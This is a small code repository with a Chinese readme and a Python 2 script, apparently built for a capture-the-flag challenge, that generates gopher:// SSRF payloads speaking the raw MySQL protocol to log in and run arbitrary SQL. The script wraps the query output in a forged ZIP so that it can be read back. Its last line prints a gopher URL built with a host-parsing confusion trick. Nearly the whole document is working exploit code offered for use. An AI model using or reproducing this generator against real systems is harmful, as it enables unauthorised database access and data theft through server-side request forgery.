├── readme
└── exploit.py


/readme:
--------------------------------------------------------------------------------
1 | 帮助生成gopher攻击mysql的payload
2 | 
3 | mysql协议实现了登录认证和执行sql
4 | 
5 | python exploit.py -u test -d '' -P 'select now()' -v -c
6 | 
7 | 可以连接本地数据库，dump packet查看协议细节


--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # coding=utf-8
  3 | 
  4 | from socket import *
  5 | from struct import *
  6 | from urllib2 import quote,unquote
  7 | import sys
  8 | import hashlib
  9 | import argparse
 10 | 
 11 | 
 12 | 
 13 | def hexdump(src, title, length=16):
 14 |     result = []
 15 |     digits = 4 if isinstance(src, unicode) else 2
 16 | 
 17 |     for i in xrange(0, len(src), length):
 18 |         s = src[i:i + length]
 19 |         hexa = b''.join(["%0*X" % (digits, ord(x)) for x in s])
 20 |         hexa = hexa[:16]+" "+hexa[16:]
 21 |         text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
 22 |         result.append(b"%04X  %-*s  %s" % (i, length * (digits + 1), hexa, text))
 23 |     print title
 24 |     print(b'\n'.join(result))
 25 |     print '\n'
 26 | 
 27 | def create_zip(filename, content_size):
 28 |     content = '-'*content_size
 29 |     filename = pack('<%ds'%len(filename), filename)
 30 |     content_len_b = pack('<I', len(content))
 31 |     filename_len_b = pack('<H', len(filename))
 32 |     local_file_header = b"\x50\x4b\x03\x04\x0a\x00"+"\x00"*12
 33 |     local_file_header += content_len_b*2
 34 |     local_file_header += filename_len_b
 35 |     local_file_header += "\x00\x00"
 36 |     local_file_header += filename
 37 |     cd_file_header = b"\x50\x4b\x01\x02\x1e\x03\x0a\x00"+"\x00"*12+filename_len_b+"\x00"*16+filename
 38 |     cd_file_header_len_b = pack("<I", len(cd_file_header))
 39 |     offset = pack("<I",len(local_file_header+cd_file_header))
 40 |     eof_record = b"\x50\x4b\x05\x06"+"\x00"*4+"\x01\x00"*2+cd_file_header_len_b+offset+"\x00\x00"
 41 |     #return each party of zip
 42 |     return [local_file_header,content,cd_file_header+eof_record]
 43 | 
 44 | 
 45 | 
 46 | class Protocal:   
 47 |     last_packet_index = 0 
 48 |     connect_status = 0 #mark last connection is finish or no
 49 |     login_packet = ''
 50 |     def __init__(self, host, port, username, password, database):
 51 |         self.username = username
 52 |         self.password = password
 53 |         self.database = database
 54 |         self.host = host
 55 |         self.port = port
 56 |         
 57 | 
 58 |     def __unpack(self, data):
 59 |         length = unpack('I', data[:3]+b'\x00')
 60 |         self.last_packet_index = unpack('B', data[3:4])[0]
 61 |         if len(data)-4 != length[0]:
 62 |             print '[-] packet parse error, except lengt {} but {}'.format(length[0], len(data))
 63 |             sys.exit(1)
 64 |         return data[4:];
 65 | 
 66 |     def __pack(self, data):
 67 |         if self.connect_status == 0:
 68 |             self.last_packet_index += 1
 69 |         elif self.connect_status == 1:
 70 |             self.last_packet_index = 0
 71 |         header = len(data)
 72 |         header = pack('<I', len(data))[:3]+pack('B', self.last_packet_index)
 73 |         return header+data
 74 | 
 75 |     def __parse_handshake(self, data):
 76 |         if DEBUG:
 77 |             hexdump(data,'server handshake')
 78 |         data = self.__unpack(data)
 79 |         protocolVersion = unpack('B', data[:1])
 80 |         svLen = 0
 81 |         for byte in data[1:]:
 82 |             svLen += 1
 83 |             if byte == b'\x00':
 84 |                 break;
 85 |         serverVersion = data[1:svLen]
 86 |         threadId = unpack('I', data[svLen+1:svLen+5])
 87 |         scramble = unpack('8B', data[svLen+5:svLen+13])
 88 |         serverEncode = unpack('B',data[svLen+16:svLen+17])
 89 |         scramble += unpack('12B', data[svLen+32:svLen+44])
 90 |         scramble = ''.join([chr(i) for i in scramble])
 91 |         packet = {
 92 |             'protocolVersion':protocolVersion[0],
 93 |             'serverVersion':serverVersion[0],
 94 |             'threadId':threadId[0],
 95 |             'scramble':scramble,
 96 |             'serverEncode':serverEncode[0]
 97 |         }
 98 |         return packet
 99 | 
100 |     def encode_password(self, password, scramble):
101 |         if password:
102 |             stage1_hash = self.__sha1(password)
103 |             token = self.xor_string(self.__sha1(scramble+self.__sha1(stage1_hash)), stage1_hash)
104 |             return token
105 |         else:
106 |             return ""
107 | 
108 |     def xor_string(self, str1, str2):
109 |         r = ''
110 |         for x,y in zip(str1, str2):
111 |             r += chr(ord(x)^ord(y))
112 |         return r
113 | 
114 |     def __sha1(self, data):
115 |         m = hashlib.sha1()
116 |         m.update(data)
117 |         return m.digest()
118 |     
119 |     def get_client_capabilities(self):
120 |         CLIENT_LONG_PASSWORD = 0x0001
121 |         CLIENT_FOUND_ROWS = 0x0002
122 |         CLIENT_LONG_FLAG         = 0x0004
123 |         CLIENT_CONNECT_WITH_DB = 0x0008
124 |         CLIENT_ODBC = 0x0040
125 |         CLIENT_IGNORE_SPACE = 0x0100
126 |         CLIENT_PROTOCOL_41 = 0x0200
127 |         CLIENT_INTERACTIVE = 0x0400
128 |         CLIENT_IGNORE_SIGPIPE = 0x1000
129 |         CLIENT_TRANSACTIONS = 0x2000
130 |         CLIENT_SECURE_CONNECTION = 0x8000
131 |         flag = 0;
132 |         flag = flag|CLIENT_LONG_PASSWORD|CLIENT_FOUND_ROWS|CLIENT_LONG_FLAG|CLIENT_CONNECT_WITH_DB|CLIENT_ODBC|CLIENT_IGNORE_SPACE|CLIENT_PROTOCOL_41|CLIENT_INTERACTIVE|CLIENT_IGNORE_SIGPIPE|CLIENT_TRANSACTIONS|CLIENT_SECURE_CONNECTION;
133 |         return pack('I', flag);
134 | 
135 |     def __write(self, data):
136 |         return self.sock.send(data)
137 | 
138 |     def __read(self, lentgh):
139 |         return self.sock.recv(lentgh)   
140 | 
141 |     def __get_login_packet(self, scramble):
142 |         packet = ''
143 |         packet += self.get_client_capabilities() #clientFlags
144 |         packet += pack('I', 1024*1024*16) #maxPacketSize
145 |         packet += b'\x21' #charset 0x21=utf8
146 |         packet += b'\x00'*23
147 |         packet += self.username+b'\x00'
148 |         passowrd = self.encode_password(self.password, scramble)
149 |         packet += chr(len(passowrd))+passowrd
150 |         packet += self.database + b'\x00'
151 |         packet = self.__pack(packet)
152 |         return packet
153 | 
154 |     def execute(self, sql):
155 |         packet = self.__pack(b'\x03'+sql)
156 |         if DEBUG:
157 |             hexdump(packet, 'execute request packet')
158 |         self.__write(packet)
159 |         response = self.__read(1000)
160 |         if DEBUG:
161 |             hexdump(response, 'execute result packet')
162 |         return response
163 | 
164 |     def __login(self, scramble):
165 |         packet = self.__get_login_packet(scramble);
166 |         if DEBUG:
167 |             hexdump(packet, 'client login packet:')
168 |         self.__write(packet);
169 |         response = self.__read(1024)
170 |         responsePacket = self.__unpack(response)
171 |         self.connect_status = 1;
172 |         if responsePacket[0] == b'\x00':
173 |             print '[+] Login Success'
174 |         else:
175 |             print '[+] Login error, reason:{}'.format(responsePacket[4:])
176 |         if DEBUG:
177 |             hexdump(response, 'client Login Result packet:')
178 | 
179 |     def get_payload(self, _sql, size, verbose):
180 |         if _sql[-1] == ';':
181 |             _sql = _sql[:-1]
182 |         zipFile = create_zip('this_is_the_flag', size)
183 |         sql = 'select concat(cast({pre} as binary), rpad(({sql}), {size}, \'-\'), cast({suf} as binary))'.format(pre='0x'+zipFile[0].encode('hex'), sql=_sql, size=size, suf='0x'+zipFile[2].encode('hex'))
184 |         if verbose:
185 |             print 'sql: ',sql
186 |         login_packet = self.__get_login_packet('')
187 |         self.connect_status = 1;
188 |         packet = self.__pack(b'\x03'+sql)
189 |         return login_packet + packet
190 | 
191 |     def connect(self):
192 |         try:
193 |             self.sock = socket(AF_INET, SOCK_STREAM)
194 |             self.sock.connect((self.host, int(self.port)))
195 |         except Exception,e:
196 |             print '[-] connect error: {}'.format(str(e))
197 |             return
198 |         handshakePacket = self.__read(1024)
199 |         handshakeInfo = self.__parse_handshake(handshakePacket);
200 |         self.__login(handshakeInfo['scramble'])
201 | 
202 | 
203 | 
204 | 
205 | 
206 | parser = argparse.ArgumentParser(description='generate payload of gopher attack mysql')
207 | parser.add_argument("-u", "--user", help="database user", required=True)
208 | parser.add_argument("-d", "--database", help="select database", required=True)
209 | parser.add_argument("-t", "--target", dest="host", help="database host", default="127.0.0.1")
210 | parser.add_argument("-p", "--password", help="database password default null", default="")
211 | parser.add_argument("-P", "--payload", help="the sql you want to execute with out ';'", required=True)
212 | parser.add_argument("-v", "--verbose", help="dump details", action="store_true")
213 | parser.add_argument("-c", "--connect", help="connect your database", action="store_true")
214 | parser.add_argument("--sql", help="print generated sql", action="store_true")
215 | 
216 | 
217 | 
218 | if __name__ == '__main__':
219 |     args = parser.parse_args()
220 |     DEBUG = 0
221 |     if args.verbose:
222 |         DEBUG = 1
223 |     #default database user m4st3r_ov3rl0rd
224 |     protocal = Protocal(args.host, '3306', args.user, args.password, args.database)
225 |     if args.connect:
226 |         protocal.connect()
227 |         result = protocal.execute(args.payload)
228 |         print '-'*100
229 |         print '| sql:',args.payload,'|'
230 |         print '-'*100
231 |         print 'Result: ',result
232 |         print '-'*100
233 | 
234 |     payload = protocal.get_payload(args.payload, 1000, args.verbose)+'\x00'*4
235 |     print '\nPayload:'
236 |     print ' '*5,'gopher://foo@[cafebabe.cf]@yolo.com:3306/A'+quote(payload)
237 | 
238 | 
239 | 
240 | 
241 | 
242 | 
243 | 
244 | 
245 | 
246 | 
247 | 
248 | 
249 | 
250 | 
251 | 


--------------------------------------------------------------------------------